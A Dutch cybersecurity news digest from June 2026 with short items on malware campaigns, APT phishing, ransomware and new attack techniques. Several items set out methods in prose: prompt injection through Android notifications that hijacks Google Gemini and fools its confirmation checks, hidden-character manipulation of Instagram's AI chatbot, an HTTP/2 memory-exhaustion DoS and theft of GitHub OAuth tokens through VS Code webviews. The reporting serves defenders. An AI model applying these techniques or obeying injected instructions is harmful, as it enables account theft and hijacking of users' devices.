03 juni 2026 | Nieuwe Instagram-exploit misbruikt Meta's AI-chatbot voor stelen gebruikersnamen
Een recente ontdekking wijst op een exploit binnen Instagram die misbruik maakt van de AI-chatbot van Meta. Deze chatbot, die onvoldoende beveiligingsmechanismen zou hebben, wordt ingezet door kwaadwillenden om premium gebruikersnamen te bemachtigen, met name de gewilde 'one-letter' accounts. De methode omvat het misleiden van de AI door het gebruik van verborgen karakters, waarna de chatbot wordt overgehaald om de gewenste wijziging van de gebruikersnaam toe te passen.
De exploit stelt verkopers in staat om via slinkse methoden toegang te krijgen tot unieke en waardevolle Instagram-gebruikersnamen. Door de AI te manipuleren met specifieke, verborgen tekens, kunnen zij de chatbot ertoe bewegen om beheerdersacties uit te voeren en de gewenste gebruikersnaamoverdracht te bewerkstelligen. Monitoringbots hebben reeds waargenomen dat originele, korte gebruikersnamen op deze manier van eigenaar wisselen.
Dit incident benadrukt de risico's die gepaard gaan met de integratie van AI-systemen in platforms waar gevoelige gebruikersgegevens en beheerrechten een rol spelen. Een gebrek aan robuuste 'guardrails' of beveiligingsprotocollen in AI-chatbots kan leiden tot onbedoelde kwetsbaarheden die door kwaadwillende actoren worden uitgebuit. Voor Instagram-gebruikers, inclusief die in Nederland en België, betekent dit een potentieel risico op het verlies van hun unieke accountnamen aan derden. Het incident onderstreept de noodzaak voor Meta om de beveiliging van zijn AI-systemen grondig te herzien en te versterken om dergelijke manipulaties te voorkomen en de integriteit van gebruikersaccounts te waarborgen. De exacte technische details van de gebruikte verborgen karakters en de wijze waarop de AI precies wordt misleid, zijn niet verder gespecificeerd in de melding.
Bron: Cybercrimeinfo
03 juni 2026 | Nieuwe FlutterShell macOS backdoor verspreid via Google Ads malvertising
Onderzoekers van Unit 42 hebben een wijdverbreide malvertising campagne gedetecteerd die gericht is op macOS-gebruikers. Deze campagne, genaamd "Operation FlutterBridge", verspreidt de nieuwe FlutterShell backdoor en lijkt een verdere ontwikkeling te zijn van de "JSCoreRunner" campagne die in augustus 2025 voor het eerst werd geïdentificeerd. De financieel gemotiveerde aanvallers achter deze campagnes zijn overgestapt van het leveren van standaard adware naar adware met volledige backdoor functionaliteiten.
FlutterShell, gebouwd met het Flutter framework, infecteert slachtoffers met adware via kwaadaardige desktop applicaties. Naast de adware functionaliteit beschikt de payload over uitgebreide backdoor mogelijkheden, waaronder de uitvoering van shell commando's en manipulatie van bestandssystemen. Sommige varianten misbruiken zelfs functies voor AI samenvattingen voor data exfiltratie, waarbij documenten via een door de aanvaller beheerde server worden gerouteerd voordat ze worden verwerkt. De FlutterShell malware wordt actief doorontwikkeld, waarbij snel nieuwe verbeteringen in de code worden geïntegreerd.
Operation FlutterBridge richt zich op een wereldwijd publiek via een uitgebreide Google Ads campagne, met een sterke nadruk op Engelstalige en West-Europese markten. Honderden door Google geverifieerde advertenties worden hiervoor gebruikt. Onderzoek wijst uit dat de aanvallers achter dit cluster van activiteiten een reeks dekmantelbedrijven inzetten om de controle van advertentienetwerken te omzeilen en deze aanvallen op grote schaal te orkestreren. Unit 42 heeft deze adverteerders gemeld bij Google, dat heeft laten weten de betreffende adverteerdersaccounts te hebben opgeschort wegens schending van hun beleid.
Unit 42 volgt Operation FlutterBridge en de JSCoreRunner campagne onder de clusteractiviteit die zij aanduiden als CL-CRI-1089. Palo Alto Networks klanten worden beschermd tegen de beschreven dreigingen via producten zoals Advanced WildFire, Advanced URL Filtering, Advanced DNS Security, Cortex Agentix Threat Intel Agent, Cortex XDR en XSIAM.
Bron: Unit 42 | Bron 2: github.com | Bron 3: mastodon.social
03 juni 2026 | Pakistan-gelinkte SideCopy richt zich op Afghaanse overheid met Xeno RAT
Cybersecurityonderzoekers hebben details bekendgemaakt van een spear phishing campagne die vermoedelijk is uitgevoerd door de aan Pakistan gelinkte groep SideCopy. De campagne richtte zich op het Afghaanse Ministerie van Financiën met een open source remote access trojan, genaamd Xeno RAT. De activiteiten zijn door Seqrite Labs gedetailleerd beschreven en hebben de codenaam Operation XENOFISCAL gekregen.
De aanval begint met een spear phishing levering, waarbij een ZIP-archief wordt gebruikt dat een kwaadaardig LNK-bestand bevat. Dit bestand is voorzien van een zorgvuldig opgestelde Pashto taal bestandsnaam, wat duidt op een diepgaande kennis van de doelomgeving. Naast het Ministerie van Financiën waren ook provinciale inkomsten- en financiële directies, Pashto sprekende overheidsfunctionarissen en provinciale overheidsmedewerkers doelwit van de campagne.
SideCopy is de naam van een dreigingsgroep die opereert onder de bredere Transparent Tribe (ook bekend als APT36) paraplu. Deze groep staat bekend om het gebruik van diverse malwarefamilies voor het stelen van gevoelige data van gecompromitteerde systemen. Eerder, in april 2025, werd de groep in verband gebracht met aanvallen op verschillende sectoren in India, waarbij Xeno RAT, Spark RAT en CurlBack RAT werden ingezet. De huidige campagne is een voortzetting van deze bredere reeks kwaadaardige cyberactiviteiten gericht op entiteiten in Zuid-Azië.
Na uitvoering misbruikt het Windows Shortcut (LNK) bestand "mshta.exe" om een HTML Application (HTA) op te halen van een gecompromitteerd Afghaans onderwijsdomein. Dit leidt tot de uitvoering van geobfusceerde JavaScript code in het geheugen. De malware creëert ook register gebaseerde persistentie door Microsoft Edge te imiteren, terwijl het Xeno RAT 1.8.7 en een afleidingsdocument dropt via een op DLL gebaseerde loader.
Xeno RAT is ontworpen om via TCP verbinding te maken met een externe server en commando's van de operator te ontvangen. De malware kan externe DLL-modules laden en uitvoeren, data naar de server verzenden, zichzelf starten via een geplande taak, antivirusinformatie ophalen, SOCKS5 proxy gebaseerde netwerk tunneling ondersteunen, bestandsoperaties uitvoeren, toetsaanslagen loggen, schermafbeeldingen maken, het klembord monitoren, webcam en microfoon volgen, persistentiemethoden verwijderen en zichzelf de-installeren.
Deze onthulling valt samen met het verschijnen van details over een gerichte phishing operatie die gebruikmaakt van geprepareerde Linux .desktop bestanden. Deze operatie richtte zich op de Indiase militaire infrastructuur met lokmiddelen gerelateerd aan contracten voor de aanschaf van Indiase gepantserde voertuigen. Deze campagne wordt eveneens toegeschreven aan Transparent Tribe. Een rapport van beveiligingsonderzoeker R.D. Tarun van vorige maand beschrijft hoe deze campagne zich richt op individuen die verbonden zijn met de Indiase militaire en defensie-infrastructuur via WhatsApp gebaseerde social engineering en een gefaseerde shell payload levering. Na uitvoering initieert de kwaadaardige .desktop launcher een zwaar geobfusceerde, op shell gebaseerde infectieketen, inclusief gefaseerde payload retrieval, inline decodering routines en de implementatie van een op Golang gebaseerde ELF-implantaat, genaamd DeskRAT.
Bron: Seqrite Labs
04 juni 2026 | CISA waarschuwt voor cyberaanvallen op brandstoftank monitoringsystemen
CISA, de FBI, de NSA, het Amerikaanse Ministerie van Energie en andere Amerikaanse overheidsinstanties waarschuwen voor cyberaanvallen gericht op via internet toegankelijke automatische tankmeetinstrumenten (ATG-systemen). Deze systemen worden gebruikt voor het monitoren van brandstof- en vloeistofopslagtanks in diverse vitale infrastructuursectoren. Het cybersecurity-agentschap stelt dat ATG-systemen veelvuldig worden toegepast in de energie-, chemische, voedsel- en landbouw- en transportsystemensector om op afstand opslagtankniveaus, temperaturen en potentiële lekken te bewaken.
Volgens de Amerikaanse overheid richten dreigingsactoren zich op blootgestelde apparaten en wijzigen zij systeeminstellingen door het uitvoeren van commando's. De waarschuwing, die de Amerikaanse overheid nog niet heeft toegeschreven aan een specifieke staat of dreigingsgroep, beschrijft hoe cyberdreigingsactoren via internet toegankelijke ATG-systemen compromitteren en deze vervolgens aanpassen door commando's uit te voeren.
Aanvallers verkrijgen toegang door misbruik te maken van kwetsbaarheden die authenticatie omzeilen, vastgelegde inloggegevens, fouten in de uitvoering van commando's van het besturingssysteem, SQL-injectie kwetsbaarheden en zwakheden in privilege-escalatie. Indien een systeem succesvol wordt gecompromitteerd, kunnen de aanvallers netwerkinstellingen, productidentificatoren, tankvolumes en pompbediening wijzigen. Ze kunnen ook waarschuwingen uitschakelen en omstandigheden creëren die voorkomen dat operators de tankvulniveaus correct monitoren, wat het risico op lekken of storingen van apparatuur potentieel verhoogt.
De instanties dringen er bij organisaties op aan om ATG-systemen af te schermen van het internet, toegang op afstand te beperken via firewalls, VPN's of toegangscontrolelijsten, standaardwachtwoorden te vervangen, sterke inloggegevens en meervoudige authenticatie te gebruiken, beveiligingsupdates toe te passen en systemen actief te monitoren op ongeautoriseerde wijzigingen.
Hoewel de waarschuwing de activiteit niet toeschrijft aan een specifieke dreigingsactor, volgt deze op een rapportage van CNN in mei, waarin werd gemeld dat Iraanse hackers verantwoordelijk waren voor een reeks inbraken waarbij ATG-systemen bij benzinestations in meerdere Amerikaanse staten betrokken waren. Volgens CNN exploiteerden de aanvallers ATG-systemen die met het internet waren verbonden en beschermd werden door zwakke of ontbrekende wachtwoorden, waardoor zij toegang kregen tot weergaven en deze konden manipuleren. De aanvallers wijzigden echter niet de werkelijke brandstofniveaus. De incidenten veroorzaakten naar verluidt geen fysieke schade, maar wekten bezorgdheid dat aanvallers potentieel kunnen interfereren met lekdetectie en andere veiligheidsgerelateerde functies. CNN meldde dat Iran de primaire verdachte was vanwege hun geschiedenis van het aanvallen van brandstofbeheersystemen en andere industriële controlesystemen. Desondanks stelden meerdere bronnen die op de hoogte waren van het onderzoek, volgens CNN, dat het mogelijk niet lukt om de activiteit toe te schrijven aan een specifieke aanvaller, omdat er beperkt forensisch bewijs is achtergelaten bij de aanvallen. CISA en haar partners adviseren organisaties die ATG-systemen beheren om hun blootstelling te evalueren en de aanbevolen mitigaties onmiddellijk te implementeren om het risico op compromittering te verminderen.
Bron: CISA | Bron 2: ic3.gov | Bron 3: cnn.com
04 juni 2026 | Nieuwe aanvalstechniek kaapt Google Gemini via kwaadaardige notificaties
Onderzoekers van SafeBreach hebben een aanvalstechniek ontdekt waarmee de voice assistent Google Gemini op Android-apparaten gekaapt kan worden door middel van een enkele kwaadaardige notificatie. Deze notificaties kunnen afkomstig zijn van populaire apps zoals WhatsApp, Slack, sms, Signal, Instagram of Messenger. Een kwaadaardige app op het apparaat is niet vereist; Gemini hoeft de vijandige notificatie alleen als bruikbare context te interpreteren.
De ontdekking, gepubliceerd door Or Yair van SafeBreach, bouwt voort op eerder onderzoek naar 'Invitation Is All You Need'-aanvallen, die vergelijkbare trucs uitvoerden via kwaadaardige Google Agenda-uitnodigingen. Hoewel Google Gemini na dat eerdere werk had versterkt tegen indirecte prompt injectie, vond Yair een manier om deze nieuwe verdedigingsmechanismen te omzeilen. Google heeft de kwetsbaarheid inmiddels gepatcht. SafeBreach heeft geen CVE-nummer voor dit probleem vermeld en er is geen bewijs dat de techniek ooit in de praktijk is gebruikt.
De aanval is specifiek voor Android, omdat Gemini's 'Utilities'-functie daar notificaties kan lezen en beantwoorden. De agent die deze notificaties leest, behandelt hun tekst als instructies. Elk mechanisme dat een notificatie naar een telefoon kan sturen, kan zo een payload leveren, een aanvalsoppervlak dat Yair als "effectief oneindig" omschreef.
De impact van de aanval is breed. Aanvallers kunnen de output van Gemini herschrijven, inclusief het faken van berichten van contactpersonen. Zo kan een gesproken bericht als "uw manager vroeg u om de documenten naar deze Drive map te uploaden" moeilijk te onderscheiden zijn van een legitiem verzoek. De methode kan ook worden gebruikt om fysieke acties te initiëren, zoals het openen van een venster of het starten van een app, acties die Google's eerdere mitigaties moesten voorkomen. Verdere gevolgen omvatten smart home controle via Google Home (ramen, boilers, verlichting), tracking en downloads via URL's, en het geforceerd laten deelnemen aan Zoom-vergaderingen. De techniek maakt zelfs geheugenvergiftiging mogelijk, waarbij Gemini een door de aanvaller gekozen feit permanent opslaat op account-niveau, en persistentie via geplande acties.
Om Google's nieuwe verdedigingsmechanismen te omzeilen, ontwikkelde Yair de 'Fake Context Alignment'-techniek. Deze techniek creëert twee illusies tegelijkertijd: een legitiem ogende autorisatie voor de beveiligingscheck van Google en een onschuldige uitwisseling voor de gebruiker. Dit wordt bereikt via 'versluiering' (Obfuscated) en 'demping' (Muted):
* **Versluierd:** Gemini stelt de echte autorisatievraag in een onbegrijpelijke taal (bijvoorbeeld Chinees), gevolgd door een onschuldige Engelse vraag. De gebruiker zegt "Ja" op de Engelse vraag, en de backend koppelt die "Ja" aan de verborgen autorisatie.
* **Gedempt:** De kwaadaardige vraag wordt verborgen in een hyperlink die de tekst-naar-spraak functie van Gemini overslaat. De assistent spreekt een generieke foutmelding uit, terwijl op het scherm de autorisatievraag wordt getoond. De gebruiker zegt "Ja", en de on-screen tekst wordt verwerkt.
De combinatie van deze methoden stelt aanvallers in staat om Google's controles te passeren terwijl voor de gebruiker een normale uitwisseling klinkt.
SafeBreach rapporteerde de bevindingen op 17 augustus 2025 aan Google, die de kwetsbaarheid als hoge prioriteit behandelde. Google bevestigde op 14 november 2025 dat verbeteringen aan de content classifier de notificatie-injecties en de 'Delayed Tool Invocation' bypass hadden gemitigeerd. Omdat de oplossing server-side is, is geen app-update nodig. Gebruikers kunnen uit voorzorg de 'Utilities' app ontkoppelen in Gemini's 'Connected Apps' instellingen, of de 'Notification read, reply & control' permissie van de Google app op Android uitschakelen.
Bron: SafeBreach | Bron 2: blog.google
04 juni 2026 | Nieuwe 'HTTP/2 Bomb' DoS-aanval legt webservers binnen minuut plat
Een recent ontdekte denial-of-service (DoS) aanval, genaamd 'HTTP/2 Bomb', is in staat om veelgebruikte webservers binnen enkele seconden ontoegankelijk te maken. Deze aanval kan worden uitgevoerd vanaf één enkele machine en misbruikt standaard HTTP/2-configuraties van prominente webserversoftware, waaronder NGINX, Apache HTTP Server, Microsoft IIS, Envoy en Cloudflare Pingora.
De ontdekking werd gedaan door de Codex software agent van OpenAI, onder begeleiding van onderzoekers van het offensieve beveiligingsbedrijf Calif. De 'HTTP/2 Bomb' combineert twee eerder bekende HTTP/2 DoS-methoden: de HPACK-compressie-amplificatie en de Slowloris-stijl resource-retentie via HTTP/2 flow-control stalling. De combinatie van deze technieken heeft een aanzienlijke impact.
Onderzoekers van Calif benadrukken dat een enkele cliënt met een 100 Mbps internetverbinding binnen seconden tientallen gigabytes aan RAM van een kwetsbare server kan uitputten. Dit dwingt de server om geheugen toe te wijzen en voorkomt vervolgens dat dit geheugen weer wordt vrijgegeven. In tests met Apache httpd en Envoy kon een enkele cliënt in ongeveer twintig seconden 32 GB aan servergeheugen verbruiken en vasthouden.
De aanval misbruikt het HPACK-mechanisme van het HTTP/2-protocol, dat wordt gebruikt voor header-compressie. Een aanvaller voegt een header toe aan de dynamische HPACK-tabel en refereert deze vervolgens herhaaldelijk via een compacte geïndexeerde representatie van slechts één byte groot. Het gevolg hiervan is dat een enkele byte die door de aanvaller wordt verzonden, kan resulteren in duizenden bytes aan server-side geheugenallocatie. Envoy en Apache httpd lieten de slechtste ratio's zien, met respectievelijk 5.700:1 en 4.000:1.
Het tweede deel van de aanval richt zich op het voorkomen dat het toegewezen geheugen wordt vrijgegeven nadat een verzoek is voltooid. Dit wordt bereikt door een zero-byte flow-control window te adverteren. In plaats van een volledige respons te versturen, stuurt de server periodiek kleine WINDOW_UPDATE frames om timeouts te vermijden. Hierdoor worden de verzoeken nooit volledig afgerond en blijft het toegewezen geheugen groeien zonder te worden vrijgegeven. Deze methode omzeilt bestaande beveiligingsmaatregelen, zoals limieten op de totale gedecodeerde headergrootte, omdat de headerwaarden die in de aanval worden gebruikt klein zijn en de amplificatie voortkomt uit interne boekhouding en geheugenallocaties per header.
Tests met de nieuwe DoS-aanvalstechniek tegen vier belangrijke webservers leverden de volgende resultaten op:
* Envoy 1.37.2 putte 32 GB RAM uit in ongeveer 10 seconden.
* Apache httpd 2.4.67 putte 32 GB RAM uit in ongeveer 18 seconden.
* nginx 1.29.7 putte 32 GB RAM uit in ongeveer 45 seconden.
* Microsoft IIS (Windows Server 2025) putte 64 GB RAM uit in ongeveer 45 seconden.
De volledige technische details van de 'HTTP/2 Bomb' DoS-aanval zullen later deze maand worden gepresenteerd door onderzoeker Quang Luong op de Real World AI Security-conferentie. Proof-of-concept (PoC) exploits voor deze nieuwe aanvalsmethode zijn echter reeds gepubliceerd.
Niet alle webservers zijn kwetsbaar voor de 'HTTP/2 Bomb'. Voor sommige platforms zijn al patches uitgebracht. Bovendien kunnen bepaalde aangepaste serverconfiguraties indirecte bescherming bieden. Systemen die achter Content Delivery Networks (CDN's) of reverse proxies draaien, bijvoorbeeld, stellen het kwetsbare HTTP/2-eindpunt niet direct bloot en zijn moeilijker te targeten. Ook kunnen sommige implementaties al beschikken over aangepaste header-count limieten, Web Application Firewalls (WAF's), reverse proxies, of hebben zij HTTP/2 uitgeschakeld.
Het probleem is opgelost in nginx versie 1.29.8 door de introductie van een 'max_headers' directive. Voor Apache httpd mod_http2 2.0.41 is het probleem geïdentificeerd als CVE-2026-49975 en ook hiervoor is een fix beschikbaar. Ten tijde van de publicatie is er nog geen patch beschikbaar voor IIS, Envoy of Pingora. Voor deze webservers wordt aanbevolen om HTTP/2 uit te schakelen waar dit haalbaar is, en een proxy of firewall ervoor te plaatsen die strikte header-count limieten afdwingt.
Bron: Calif | Bron 2: github.com | Bron 3: hubs.li
04 juni 2026 | Google DoubleClick misbruikt in nieuwe malspam campagne met DesckVB RAT
Cybersecurityonderzoekers hebben een nieuwe malspam campagne geïdentificeerd die misbruik maakt van het DoubleClick-domein van Google om detectie te omzeilen en uiteindelijk de DesckVB RAT, een remote access trojan, te verspreiden. Volgens een rapport van Huntress-onderzoekers Anna Pham en Adam Mooney, gedeeld met The Hacker News, wordt de lokker door DoubleClick geleid voordat het slachtoffer de door de aanvallers beheerde infrastructuur bereikt. Dit is opmerkelijk omdat DoubleClick een legitiem, door Google beheerd domein is dat door veel beveiligingstools minder snel als verdacht wordt aangemerkt.
Vanaf DoubleClick wordt het slachtoffer doorgestuurd naar een malspam kit die zichzelf dynamisch aanpast met het e-mailadres van het slachtoffer. Deze kit haalt bedrijfsbranding en locatiegegevens op, waardoor de landingspagina overtuigend lijkt zonder dat de operators voor elk doelwit handmatig een lokker hoeven te maken. Dit maakt de operaties schaalbaarder en kosteneffectiever, omdat er geen op maat gemaakte kit nodig is voor elke gerichte organisatie. Het uiteindelijke doel van de campagne is het installeren van DesckVB RAT, een trojan gebaseerd op .NET die sinds februari 2026 actief is.
De aanval begint wanneer een onoplettende gebruiker een HTML-bestand opent dat is bijgevoegd bij een phishing-e-mail. Dit bestand activeert een meta-refresh browseromleiding naar een DoubleClick Campaign Manager URL voor klikregistratie. Vanaf daar wordt de gebruiker naar een andere redirector geleid, die het Base64-gecodeerde e-mailadres decodeert en het slachtoffer naar een landingspagina stuurt met een "Download PDF"-knop. Door op deze knop te klikken, reageert de server met een ZIP-archief dat de rest van de infectieketen initieert.
Dit wordt bereikt door middel van een JavaScript-lader, wiens voornaamste taak is het ophalen en uitvoeren van een .NET RAT zonder op te vallen. Het script extraheert en voert een PowerShell-script uit, dat vervolgens een .NET-lader ophaalt van een externe server. Deze lader fungeert als een stager die controleert of het niet wordt geanalyseerd, de beveiligingscontroles van de machine neutraliseert, persistentie instelt en vervolgens de RAT-payload downloadt en uitvoert. Dit gebeurt via een techniek genaamd process hollowing, waarbij de malware wordt geïnjecteerd in processen die door Microsoft zijn ondertekend.
Eenmaal actief communiceert de trojan met een command-and-control (C2) server via raw TCP-sockets, voert systeemverkenning uit en configureert uitsluitingen voor Microsoft Defender. De trojan patcht ook Antimalware Scan Interface (AMSI) en Event Tracing for Windows (ETW) op native API-niveau, om Windows-telemetrie te verblinden voordat persistentie op de host wordt ingesteld. Dit gebeurt door Run- en RunOnce-registervermeldingen aan te maken en een lader, verantwoordelijk voor het starten van de RAT, in de opstartmap van de gebruiker te plaatsen. De malware kan data extraheren, commando's uitvoeren en aanvullende payloads implementeren, waardoor aanvallers volledige controle krijgen over de geïnfecteerde machines. Tegelijkertijd neemt de malware stappen om onder de radar te blijven door de machine te beëindigen en opnieuw op te starten als het een analysetool detecteert of vaststelt dat het in een sandbox-omgeving draait.
Huntress benadrukt het belang van verdediging in de diepte. Het configureren van een Group Policy Object (GPO) in Active Directory om scriptbestanden zoals .vbs, .hta en .js standaard in Kladblok te openen, kan een dreigingsactor in de allereerste fase stoppen, waardoor verdere payloads nooit worden gedropt. Op het gebied van e-mailbeveiliging moeten organisaties overwegen DMARC-, DKIM- en SPF-records te implementeren om de kans te verkleinen dat gespoofde of kwaadaardige e-mails eindgebruikers bereiken. Bovendien voegt een e-mailgatewayoplossing die bijlagen en links kan sandboxing voordat ze worden afgeleverd, een zinvolle extra beschermingslaag toe.
Bron: Huntress | Bron 2: learn.microsoft.com
04 juni 2026 | ‘The Gentlemen’ ransomwaregroep zet Fortinet-exploits en AI in
De Russischtalige ransomwaregroep die bekendstaat als ‘The Gentlemen’ is in 2026 snel uitgegroeid tot een van de meest actieve dreigingen, alleen overtroffen door Qilin. Hun arsenaal omvat het misbruiken van kwetsbaarheden in Fortinet-producten, operaties met AI-ondersteuning en een volledig op maat gemaakt command-and-control (C2) framework dat door de meeste beveiligingstools niet wordt gedetecteerd.
De groep opereert zonder centraal kantoor of traditionele salarisstructuur. Negen operatorhandles zijn geïdentificeerd die via een zelf gehoste Rocket.Chat-instantie op een onion-site met elkaar communiceren, met plannen om te migreren naar een platform gebaseerd op Rust. Dit slanke, gedistribueerde model markeert een duidelijke verschuiving van de rigide bedrijfsstructuur die groepen zoals Contionce hanteerden.
In mei 2026 wist het Ransom-ISAC onderzoeksteam 3.366 berichten te extraheren van de Rocket.Chat server van The Gentlemen. Deze berichten onthulden interne plannen, discussies over tools en details over slachtofferdoelwitten. Analisten van Vectra AI merkten in een rapport, gedeeld met Cyber Security News (CSN), op dat hoewel de tools van de groep aanzienlijk zijn veranderd, de belangrijkste zwakke punten die ze in slachtoffernetwerken misbruiken sinds 2022 vrijwel hetzelfde zijn gebleven.
De gelekte berichten brachten ook een connectie aan het licht tussen The Gentlemen en eerdere ransomwaremerken. Een onderhandelaar, bekend onder de handle “Tinker”, verscheen zowel in Black Basta-chats als in de logboeken van The Gentlemen, waarbij dezelfde operationele rol binnen beide groepen werd vervuld. Een gedeelde Matrix-homeserver, bestflowers247.online, was aanwezig in archieven van beide groepen, wat de infrastructuurverbinding met hard bewijs verankert. Dit patroon wijst erop dat ransomware-operators niet met pensioen gaan, maar rebranden. Dezelfde personen dragen hun kennis en toegang over van de ene criminele onderneming naar de volgende, waardoor de ontmanteling van groepen veel minder effectief is dan veel verdedigers zouden hopen.
Fortinet blijft de voorkeursingang voor The Gentlemen. De Rocket.Chat-logboeken vermelden FortiGate 81 keer, waarbij CVE-2024-55591, een authenticatie-bypass kwetsbaarheid in FortiOS, expliciet wordt genoemd als hun primaire toegangspunt tot slachtoffernetwerken. Een afzonderlijke analyse van Halcyon toonde aan dat de groep ongeveer 1.000 Fortinet VPN’s brute-forcet, in sommige gevallen met hergebruikte wachtwoorden zoals 'gentlemen25' en 'gentle26' bij meerdere slachtoffers.
Eenmaal binnen implementeert de groep een op maat gemaakt C2-framework genaamd G-BOT. Dit voorheen ongedocumenteerde controlepaneel ondersteunt per-beacon SOCKS5-tunneling en uploadt builders naar tijdelijke bestandssites, ter vervanging van commerciële tools zoals Cobalt Strike. Die overstap maakt detectie moeilijker voor beveiligingsteams die afhankelijk zijn van bekende signatures.
De groep richt zich ook rechtstreeks op hypervisors. Hun Linux-locker valt Hyper-V Volume Manager aan en versleutelt op hypervisor-niveau, zodat endpoint-agents binnen virtuele machines de aanval niet kunnen zien. De locker laat de extensie .i8p14s achter en een losgeldbrief met de naam README-GENTLEMEN.txt, wat aangeeft dat geen enkele infrastructuurlaag buiten bereik is.
The Gentlemen hebben AI van een nieuwigheid omgezet in een werkend onderdeel van hun operatie. Operators verwijzen naar het gebruik van GPT- en Claude-modellen om te helpen bij onderhandelingen over losgeld, waarbij één operator ze beschrijft als automatische antwoordschrijvers voor communicatie met slachtoffers. De groep bespreekt ook het huren van GPU's op vast.ai en het draaien van ongecensureerde AI modellen van Hugging Face om grote hoeveelheden gestolen data te triageren.
Voor credential theft vertrouwt de groep op Phemedrone StealerV2.3.2, LummaC2, XenAllPasswordPro, Chrome App-Bound Encryption Decryption en DumpBrowserSecrets. Deze tools halen opgeslagen wachtwoorden rechtstreeks uit browsers zonder mislukte logins te activeren, wat betekent dat standaard authenticatielogboeken niets ongewoons laten zien. Gestolen data wordt vervolgens via rclone naar MEGA verplaatst, volgens hetzelfde exfiltratiepatroon dat ransomwaregroepen al jaren gebruiken.
Verdedigers kunnen concrete stappen ondernemen op basis van de gelekte chats. Beveiligingsteams moeten edge-apparaten, waaronder Palo Alto, Fortinet, Citrix, F5 en Cisco-apparatuur, controleren op de CVE-lijst die in de operator-chats is besproken. Het behandelen van NTDS.dit en VSS-back-up toegang als een urgentie één-waarschuwing, in plaats van een forensische ontdekking weken later, kan compromittering van het hele domein stoppen voordat deze zich volledig ontwikkelt. Het opsporen van tools zoals rclone, MEGAcmd, WinSCP en Velociraptor op hosts die deze niet horen te draaien, voegt een vroege waarschuwingslaag toe die logboeken alleen niet kunnen bieden.
Bron: Vectra AI
04 juni 2026 | One-click aanval via GitHub.dev en VS Code steelt GitHub OAuth tokens
Cybersecurityonderzoekers hebben een one-click aanvalsmethode onthuld die via Microsoft Visual Studio Code (VS Code) het stelen van GitHub OAuth tokens mogelijk maakt. De aanval, die is gedetailleerd door beveiligingsonderzoeker Ammar Askar, kan leiden tot de diefstal van tokens met volledige lees- en schrijfrechten voor alle repositories van een gebruiker, inclusief private.
De kwetsbaarheid bevindt zich in GitHub.dev, een lichtgewicht webgebaseerde broncode-editor die als een VS Code-omgeving in de sandbox van de webbrowser draait. GitHub.dev maakt het voor gebruikers mogelijk om pull-requests te versturen en commits te maken. Deze functionaliteit wordt bereikt doordat github.com een OAuth token via een POST-verzoek naar github.dev stuurt, waarmee het namens de gebruiker kan communiceren met GitHub. Askar benadrukt dat dit token niet beperkt is tot de specifieke repository waarmee is gecommuniceerd, maar volledige toegang biedt tot alle andere repositories waartoe de gebruiker toegang heeft.
De kern van de kwetsbaarheid stelt aanvallers in staat om kwaadaardige VS Code extensies te installeren die GitHub OAuth tokens stelen wanneer deze worden doorgegeven aan GitHub.dev. Dit wordt bereikt door misbruik te maken van een message-passing mechanisme tussen het hoofdvenster van VS Code en webviews. Webviews worden gebruikt voor het renderen van Markdown-previews of het bewerken van Jupyter notebooks.
Specifiek werkt de exploit door kwaadaardig JavaScript uit te voeren binnen een niet-vertrouwde webview. Dit JavaScript simuleert keypresses, ook wel keydown-events genoemd, in het hoofdvenster van de editor. Hierdoor wordt de Command Palette geopend via de toetscombinatie "Ctrl+Shift+P". Vervolgens wordt een door de aanvaller gecontroleerde extensie geïnstalleerd. Deze extensie extraheert het GitHub OAuth token dat naar GitHub.dev is verzonden en gebruikt de GitHub API om alle private repositories op te vragen waartoe het slachtoffer toegang heeft.
De aanpak maakt ook gebruik van een VS Code-functionaliteit genaamd 'local workspace extensions'. Deze functie maakt het mogelijk om een extensie direct te installeren zonder een extra vertrouwensdialoogvenster te presenteren, zolang deze in de map ".vscode/extensions" binnen die workspace is geplaatst. Dit omzeilt effectief de publisher trust check. De onderzoeker legde uit dat extensies als onderdeel van hun package.json extra keybindings aan VS Code kunnen toevoegen. Aangezien keybindings betrouwbaar kunnen worden geactiveerd, kan een keybind worden toegevoegd voor elk gewenst VS Code-commando, zoals het installeren van een extensie terwijl de trusted publisher check wordt overgeslagen.
De kwetsbaarheid werd op 2 juni 2026 aan GitHub gemeld. Een uur later werden details van het probleem publiekelijk bekendgemaakt, mede vanwege Microsofts eerdere omgang met VS Code-gerelateerde bugs. Microsoft heeft de kwetsbaarheid erkend en heeft inmiddels een oplossing geïmplementeerd. Alexandru Dima, een partner software engineering manager bij Microsoft, heeft verduidelijkt dat dit probleem geen invloed had op VS Code Desktop. Een woordvoerder van Microsoft heeft na publicatie bevestigd dat de kwetsbaarheid voor hun diensten is verholpen en dat geen actie van klanten vereist is.
Bron: Ammar Askar | Bron 2: github.com
04 juni 2026 | Met China verbonden TA4922 breidt aanvallen met SilentRunLoader malware uit naar Europa
Een vermoedelijke cybercrimegroep met banden met China, genaamd TA4922, die eerder bekendstond om aanvallen op organisaties in Oost-Azië, richt zich nu ook op organisaties in het Verenigd Koninkrijk, Duitsland, Italië en Zuid-Afrika. Onderzoekers van Proofpoint melden dat de groep de aanvallen de afgelopen maanden heeft opgevoerd, waarbij bekende phishingtactieken worden gecombineerd met een groeiend arsenaal aan malware. De activiteiten omvatten diefstal van inloggegevens, fraudepogingen, malware voor externe toegang en het misbruik van legitieme software voor extern beheer om toegang tot slachtoffernetwerken te behouden.
Voor Britse organisaties omvatten de meest relevante activiteiten e-mails die zijn ontworpen om te lijken op routinecommunicatie van de overheid of bedrijven. Eén campagne deed zich voor als belastingdienst en verwees naar btw-aangiftes, loonbelastingdocumenten en compliance. Een andere campagne gebruikte berichten met een thema rond uitkeringen en compliance, die de taal van overheids- en universele uitkeringsdiensten kopieerden. Volgens de onderzoekers waren deze lokmiddelen niet generieke spam, maar opgesteld rond lokale bedrijfsprocessen waar werknemers al mee te maken hebben, zoals belastingpapieren, HR-mededelingen, salarisbestanden, facturen en complianceverzoeken. Deze aanpak vergroot de kans dat een ontvanger een bestand opent, op een link klikt of de conversatie naar een ander kanaal verplaatst.
Proofpoint meldt dat TA4922 historisch gezien Japan en andere delen van Azië, waaronder Taiwan, Korea, Singapore en India, heeft geviseerd. De recentere activiteit suggereert dat de groep een grotere groep slachtoffers test, waarbij Europese en Afrikaanse organisaties nu in de campagnes verschijnen.
